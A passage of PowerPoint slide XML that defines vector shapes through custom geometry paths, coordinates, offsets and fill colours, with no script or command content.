                    <a:pt x="694928" y="11981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="11460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696452" y="10942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672401" y="158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14B6FE72-0062-AF99-9235-885BB9CFA380}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2760681" y="3487696"/>
              <a:ext cx="127000" cy="66040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="127000" h="66039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126489" y="65531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126489" y="4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A14A4AEF-AC33-E8EF-B065-8DB31626E41C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2887171" y="3483125"/>
              <a:ext cx="297180" cy="67310"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="297180" h="67310">
                  <a:moveTo>
                    <a:pt x="297173" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="51815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297173" y="12953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297173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BB028FB-8166-991E-1EA6-11F140154BC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862787" y="3417593"/>
              <a:ext cx="36830" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="74929">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="74675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="9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3B6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56EDB0E5-AC12-11BE-213B-71B8AE51EEB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625048" y="2878101"/>
              <a:ext cx="36830" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="593089">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="577592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="592832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="14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09941EC8-1678-1D51-8EE9-92B0D1A2A1B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2652480" y="2775993"/>
              <a:ext cx="669290" cy="691515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="669289" h="691514">
                  <a:moveTo>
                    <a:pt x="669020" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="691129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="573782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6690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BCCC6374-BF04-0C98-899D-CD9CD50D4479}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2648670" y="2771452"/>
              <a:ext cx="676910" cy="700405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="700207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25863" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3151" y="691917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25842" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="691134"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3151" y="691917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="669020" y="575127"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25863" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="581524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="672170" y="574574"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="574574"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="574574"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="4541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673491" y="8290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="4541"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="121888"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="125084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="25842" y="121888"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25842" y="121888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="669020" y="4541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673491" y="8290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541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DABE1013-08D4-6C42-ED23-13C638CF4CC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2721058" y="2838477"/>
              <a:ext cx="546100" cy="558800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="546100" h="558800">
                  <a:moveTo>
                    <a:pt x="545579" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="558542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545579" y="462530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545579" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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5" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC68AC12-A5E1-684A-A9B8-9EE6487A7A82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91742" y="3368825"/>
              <a:ext cx="141728" cy="122681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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146655B6-2769-6E2D-0A54-54754C2421EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2616667" y="2752097"/>
              <a:ext cx="711835" cy="808355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="233166" y="714947"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137156" y="733235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137156" y="763727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269873" y="808236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361863" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269020" y="791357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171897" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190331" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="728819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="271129" y="790977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269020" y="791357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="738498"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361863" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="752511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="148200" y="749750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="751668"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171897" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="749750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="749750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="740171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="747106"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="190331" y="740171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190331" y="740171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="569241" y="737255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="579106" y="737255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="737255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="735513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="729503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="579106" y="729503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="729503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="492302" y="693222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446135" y="693466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="723552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492302" y="693222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="676732" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="711758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33716" y="729098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127086" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33618" y="712100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26712" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56817" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="13593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676732" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="239983" y="713648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="713648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="713648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="684545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242981" y="692805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="684545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="36386" y="711620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33618" y="712100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="674589"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127086" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="674589"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="12215" y="699186"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="701525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26712" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="699186"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="699186"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="594470"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="701208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492302" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484917" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419476" y="682483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469100" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="608508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="233166" y="684545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242981" y="692805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="441472" y="693222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446135" y="693466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="680081"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="419476" y="682483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="444703" y="676590"/>
                  </a:moveTo>
                  <a:lnTo>
